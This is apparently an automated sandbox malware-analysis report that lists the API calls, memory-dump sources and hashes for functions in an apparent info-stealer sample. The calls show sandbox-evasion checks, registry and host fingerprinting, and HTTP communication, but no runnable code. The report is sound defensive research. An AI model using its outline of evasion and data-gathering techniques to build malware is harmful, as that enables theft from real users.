                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 3896182533-4073750446
                                            • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                            • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                            • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                            • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A51
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A68
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A7F
                                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03024AA0
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 03024AB0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                            • Instruction ID: 3dabf6ba20d402a26dcb019228cfe74ab7d0a707c1bb91edeb00d6bdefe27ed6
                                            • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                            • Instruction Fuzzy Hash: 1E215BB5D00219ABDF14DFA4E848AED7B78FF45321F108225F965AB2D0EB706A05CF91
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                            • RegOpenKeyExA.ADVAPI32(80000002,02DF5F88,00000000,00020119,00000000), ref: 004176DD
                                            • RegQueryValueExA.ADVAPI32(00000000,02E293E8,00000000,00000000,?,000000FF), ref: 004176FE
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3466090806-2517555085
                                            • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                            • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                            • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                            • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0303790B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 03037912
                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 03037944
                                            • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 03037965
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0303796F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3225020163-2517555085
                                            • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                            • Instruction ID: 48d29d3af418d80c87b7532df0dbf31b998223118b24eb94897da62449c5fe1f
                                            • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                            • Instruction Fuzzy Hash: 55014FBDA80208BFEB00DBE0DD49FADB7BDEB49B01F005555FA05A7281D6749900CF51
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                            • RegOpenKeyExA.ADVAPI32(80000002,02DF5F88,00000000,00020119,004176B9), ref: 0041775B
                                            • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                            • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: CurrentBuildNumber
                                            • API String ID: 3466090806-1022791448
                                            • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                            • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                            • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                            • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                            APIs
                                            • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                            • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                            • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID: :A$:A
                                            • API String ID: 1378416451-1974578005
                                            • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                            • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                            • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                            • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 030275A1
                                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 03027618
                                            • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 03027674
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 030276B9
                                            • HeapFree.KERNEL32(00000000), ref: 030276C0
                                              • Part of subcall function 030294A7: vsprintf_s.MSVCRT ref: 030294C2
                                            • task.LIBCPMTD ref: 030277BC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                            • String ID:
                                            • API String ID: 700816787-0
                                            • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                            • Instruction ID: 898bb79168a0392962b49d1d58910e5863e11d3238f950a18a3b4b1a19a66657
                                            • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                            • Instruction Fuzzy Hash: B7612EB990126C9BDB24DB50CC54FEDBBB8BF84700F0485E9E649A6141DB706BC9CF94
                                            APIs
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 030264E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 03026548
                                              • Part of subcall function 030264E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 0302656A
                                              • Part of subcall function 030264E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0302659C
                                              • Part of subcall function 030264E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 030265EC
                                              • Part of subcall function 030264E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 03026626
                                              • Part of subcall function 030264E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 03026638
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0303557F
                                            • lstrlen.KERNEL32(00000000), ref: 03035596
                                              • Part of subcall function 03039097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 030390B9
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 030355CB
                                            • lstrlen.KERNEL32(00000000), ref: 030355EA
                                            • strtok.MSVCRT(00000000,?), ref: 03035605
                                            • lstrlen.KERNEL32(00000000), ref: 03035615
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID:
                                            • API String ID: 3532888709-0
                                            • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                            • Instruction ID: fc267a5bb83272b2586f497f8ae336949a93b7abc8726ee60a6e19f4508e4399
                                            • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                            • Instruction Fuzzy Hash: 66512B39A12748DBCB18FF60DE91EEE7779AF93301F544018E8466A5A0DB346B04CB51
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 03037345
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,03037574,004205BD), ref: 03037383
                                            • memset.MSVCRT ref: 030373D1
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 03037525
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID:
                                            • API String ID: 224852652-0
                                            • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                            • Instruction ID: 62faff231cc998d2ced119ebed7cac530954c03679dd9c1f7bf21908df9243e0
                                            • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                            • Instruction Fuzzy Hash: 815190F5D013189FDB14DBA4CC84BEDB7B8AF45705F5484A9E105A7180DB746A88CF58
                                            APIs
                                            • memset.MSVCRT ref: 004140D5
                                            • RegOpenKeyExA.ADVAPI32(80000001,02E29798,00000000,00020119,?), ref: 004140F4
                                            • RegQueryValueExA.ADVAPI32(?,02E28F68,00000000,00000000,00000000,000000FF), ref: 00414118
                                            • RegCloseKey.ADVAPI32(?), ref: 00414122
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                            • lstrcatA.KERNEL32(?,02E29058), ref: 0041415B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                            • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                            • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                            • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                            APIs
                                            • memset.MSVCRT ref: 0303433C
                                            • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 0303435B
                                            • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 0303437F
                                            • RegCloseKey.ADVAPI32(?), ref: 03034389
                                            • lstrcat.KERNEL32(?,00000000), ref: 030343AE
                                            • lstrcat.KERNEL32(?,0064A168), ref: 030343C2
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                            • Instruction ID: 4fc881867cb3a334853dcc8c609fa2da2ffe223947efa3faa33a3b98d86e7055
                                            • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                            • Instruction Fuzzy Hash: E64187BA940208BBDB14FBE0DC45FEE777DABDA300F00855CA6155B180EA7557888BE2
                                            APIs
                                            • strtok_s.MSVCRT ref: 00413588
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • strtok_s.MSVCRT ref: 004136D1
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E24D60,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpystrtok_s$lstrlen
                                            • String ID:
                                            • API String ID: 3184129880-0
                                            • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                            • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                            • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                            • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                            APIs
                                            • __lock.LIBCMT ref: 0041B39A
                                              • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                              • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                              • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                            • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                              • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                            • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                            • String ID:
                                            • API String ID: 2005412495-0
                                            • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                            • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                            • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                            • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                            APIs
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 03039B08
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 03039B21
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 03039B39
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 03039B51
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 03039B6A
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 03039B82
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 03039B9A
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 03039BB3
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 03039BCB
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 03039BE3
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 03039BFC
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 03039C14
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 03039C2C
                                              • Part of subcall function 03039AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 03039C45
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 03021437: ExitProcess.KERNEL32 ref: 03021478
                                              • Part of subcall function 030213C7: GetSystemInfo.KERNEL32(?), ref: 030213D1
                                              • Part of subcall function 030213C7: ExitProcess.KERNEL32 ref: 030213E5
                                              • Part of subcall function 03021377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 03021392
                                              • Part of subcall function 03021377: VirtualAllocExNuma.KERNEL32(00000000), ref: 03021399
                                              • Part of subcall function 03021377: ExitProcess.KERNEL32 ref: 030213AA
                                              • Part of subcall function 03021487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 030214A5
                                              • Part of subcall function 03021487: __aulldiv.LIBCMT ref: 030214BF
                                              • Part of subcall function 03021487: __aulldiv.LIBCMT ref: 030214CD
                                              • Part of subcall function 03021487: ExitProcess.KERNEL32 ref: 030214FB
                                              • Part of subcall function 030369D7: GetUserDefaultLangID.KERNEL32 ref: 030369DB
                                              • Part of subcall function 030213F7: ExitProcess.KERNEL32 ref: 0302142D
                                              • Part of subcall function 03037AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0302141E), ref: 03037AE7
                                              • Part of subcall function 03037AB7: RtlAllocateHeap.NTDLL(00000000), ref: 03037AEE
                                              • Part of subcall function 03037AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 03037B06
                                              • Part of subcall function 03037B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 03037B77
                                              • Part of subcall function 03037B47: RtlAllocateHeap.NTDLL(00000000), ref: 03037B7E
                                              • Part of subcall function 03037B47: GetComputerNameA.KERNEL32(?,00000104), ref: 03037B96
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 03036D31
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03036D4F
                                            • CloseHandle.KERNEL32(00000000), ref: 03036D60
                                            • Sleep.KERNEL32(00001770), ref: 03036D6B
                                            • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 03036D81
                                            • ExitProcess.KERNEL32 ref: 03036D89
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2525456742-0
                                            • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                            • Instruction ID: 8b8e9fba57e229c039463fec471c5fcd6d215e38f429766f3928124681283bef
                                            • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                            • Instruction Fuzzy Hash: C4315A79A42318ABDB08FBF0DC54FFD777DAF87201F140519A142AA490EF745A04CB62
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
